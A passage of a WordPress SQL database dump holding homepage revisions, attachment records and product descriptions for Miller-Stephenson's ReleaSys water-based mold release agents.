style="primary" text="KRYTOX &amp; LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-17 03:03:45', '2016-08-17 03:03:45', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (286, 1, '2016-08-17 03:04:24', '2016-08-17 03:04:24', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax="9" parallax_text="0"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-17 03:04:24', '2016-08-17 03:04:24', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (287, 1, '2016-08-17 03:05:35', '2016-08-17 03:05:35', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-17 03:05:35', '2016-08-17 03:05:35', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (288, 1, '2016-08-17 03:06:57', '2016-08-17 03:06:57', '[product_categories number="10" parent="0" columns="6" title="Our categories"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-17 03:06:57', '2016-08-17 03:06:57', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (289, 3, '2016-08-17 14:53:18', '2016-08-17 14:53:18', '', 'High Temperature Release Agent boron nitride', '', 'inherit', 'open', 'closed', '', 'boron-nitride', '', '', '2016-11-24 04:00:37', '2016-11-24 04:00:37', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Boron-nitride.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (290, 3, '2016-08-17 15:15:06', '2016-08-17 15:15:06', '<h2>Composite Mold Release Agent; Water-based</h2>\r\n<h3>Unmatched performance; Numerous releases per application; High surface slip</h3>\r\nReleaSys™ 8800 is a high performance water-based, semi-permanent composite mold release agent developed to yield unmatched durability and surface slip. This water-based release agent excels at releasing parts from complex, intricate mold geometries. ReleaSys 8800 is ideal for high performance composite structures and large scale molding operations. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 8800 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Superior release agent durability</li>\r\n 	<li>Water-based formulation</li>\r\n 	<li>Ideal for high complexity molds</li>\r\n 	<li>Ideal for TPU and Thermoset Plastics</li>\r\n 	<li>Highest Slip; Minimized transfer</li>\r\n 	<li>Minimized mold fouling and contamination</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers. ReleaSys 8800 is water-based release agent that is Miller-Stephenson most robust release agent and offers the greatest utility.\r\n<h3>Application Efficiency and Higher Throughput from a Single Coat</h3>\r\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of composite mold release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a></p>\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></strong>', 'ReleaSys™ 8800 | Composite Mold Release Agent', 'ReleaSys™ 8800 is a high performance water-based, semi-permanent mold release system developed to yield unmatched durability and surface slip. This formulation is ideal for high performance composite structures and large scale molding operations ReleaSys 8800 excels at releasing parts from complex, intricate mold geometries. ReleaSys 8800 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Superior release agent durability</li>\r\n 	<li>Ideal for TPU and Thermoset Plastics</li>\r\n 	<li>Ideal for high complexity molds</li>\r\n 	<li>Highest Slip; Minimized transfer</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'composite-mold-release-agent', '', '', '2017-06-16 16:57:44', '2017-06-16 16:57:44', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=290', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (291, 3, '2016-08-17 15:14:05', '2016-08-17 15:14:05', 'Composite Mold Release Agent', 'Composite Mold Release Agent', 'Composite Mold Release Agent', 'inherit', 'open', 'closed', '', 'airplane-cabin-releasys', '', '', '2016-10-07 14:15:28', '2016-10-07 14:15:28', '', 290, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Airplane-Cabin-ReleaSys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (292, 1, '2016-08-17 15:18:44', '2016-08-17 15:18:44', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-17 15:18:44', '2016-08-17 15:18:44', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (293, 3, '2016-08-17 15:24:26', '2016-08-17 15:24:26', '<h2>Rubber Molding Release Agent; Water-based</h2>\r\n<h3>Superior surface adhesion &amp; durability; Ease of application and release</h3>\r\nReleaSys™ 8500 is a highly versatile water-based, semi-permanent <span style="text-decoration: underline;"><strong>rubber molding release agent</strong></span> designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up.  ReleaSys 8500 will not interfere with post-production finishing operation.  Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional release agent durability</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Medium Slip; No transfer</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n</ul>\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">ReleaSys 8500 and ReleaSys 85 products are recommended for releasing all natural and synthetic rubber compounds including silicone. Miller-Stephenson rubber molding release agent products chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. And the semi-permanent Frekote release coatings eliminate rubber to metal bonding failures. The result? Lower scrap reduction rates of 20% or more over other products.Semi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. </span>\r\n\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.</span>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;">The application efficiency of ReleaSys can be seen by the relatively small amounts of rubber molding release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.</p>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a></p>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'ReleaSys™ 8500 | Rubber Molding Release Agent', 'ReleaSys™ 8500 is a highly versatile water-based, semi-permanent rubber molding release agent designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up.  ReleaSys 8500 will not interfere with post-production finishing operation.  Benefits of this product include:\r\n<ul>\r\n 	<li>Optimized for Rubber/Elastomer molding</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Medium Slip; No transfer</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'rubber-molding-release-agent', '', '', '2017-06-16 16:58:35', '2017-06-16 16:58:35', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=293', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (294, 3, '2016-08-17 15:27:56', '2016-08-17 15:27:56', '', 'Tires ReleaSys', '', 'inherit', 'open', 'closed', '', 'tires-releasys', '', '', '2016-08-17 15:27:56', '2016-08-17 15:27:56', '', 293, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Tires-ReleaSys-.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (295, 3, '2017-06-02 18:12:53', '2017-06-02 18:12:53', '<h2>Composite Mold Release Agent; Water-based</h2>\n<h3>Unmatched performance; Numerous releases per application; High surface slip</h3>\nReleaSys 8800 is a high performance water-based, semi-permanent composite mold release agent developed to yield unmatched durability and surface slip. This water-based release agent excels at releasing parts from complex, intricate mold geometries. ReleaSys 8800 is ideal for high performance composite structures and large scale molding operations. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 8800 will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>Superior release agent durability</li>\n 	<li>Water-based formulation</li>\n 	<li>Ideal for high complexity molds</li>\n 	<li>Ideal for TPU and Thermoset Plastics</li>\n 	<li>Highest Slip; Minimized transfer</li>\n 	<li>Minimized mold fouling and contamination</li>\n</ul>\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers. ReleaSys 8800 is water-based release agent that is Miller-Stephenson most robust release agent and offers the greatest utility.\n<h3>Application Efficiency and Higher Throughput from a Single Application</h3>\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of composite mold release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a></p>\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></strong>', 'ReleaSys 8800 | Composite Mold Release Agent', 'ReleaSys 8800 is a high performance water-based, semi-permanent mold release system developed to yield unmatched durability and surface slip. This formulation is ideal for high performance composite structures and large scale molding operations ReleaSys 8800 excels at releasing parts from complex, intricate mold geometries. ReleaSys 8800 will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>Superior release agent durability</li>\n 	<li>Ideal for TPU and Thermoset Plastics</li>\n 	<li>Ideal for high complexity molds</li>\n 	<li>Highest Slip; Minimized transfer</li>\n</ul>', 'inherit', 'closed', 'closed', '', '290-autosave-v1', '', '', '2017-06-02 18:12:53', '2017-06-02 18:12:53', '', 290, 'https://132.148.10.86/wordpress/290-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (296, 3, '2016-08-17 15:56:18', '2016-08-17 15:56:18', '', 'Rubber Molding Release Agent', '', 'inherit', 'open', 'closed', '', 'tire-releasys-8500', '', '', '2016-11-23 16:18:10', '2016-11-23 16:18:10', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Tire-releasys-8500.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (297, 3, '2016-08-17 16:43:07', '2016-08-17 16:43:07', '<h2>ReleaSys™ 8200 | PTFE Water-based Release Agents</h2>\r\n<h3>Advanced Fluoropolymer Chemistry; Dry-Film Technology, Reliable, consistent performance</h3>\r\nReleaSys™ 8200 is a PTFE Water-based Release Agents, that offers semi-permanent productive which generated a uniform dry film on the mold surface. These PTFE Water-based Release Agents are designed to provide reliable, consistent release across a broad range of moldable substrates. Excels at compression and transfer molding.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 8200 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for Silicone-based molding</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Thermally Stable (&gt;550°F)</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\r\n<h3>PTFE Water-based Release Agents - Application Efficiency; Highly Cost-Effective</h3>\r\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of PTFE Water-based Release Agents that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are 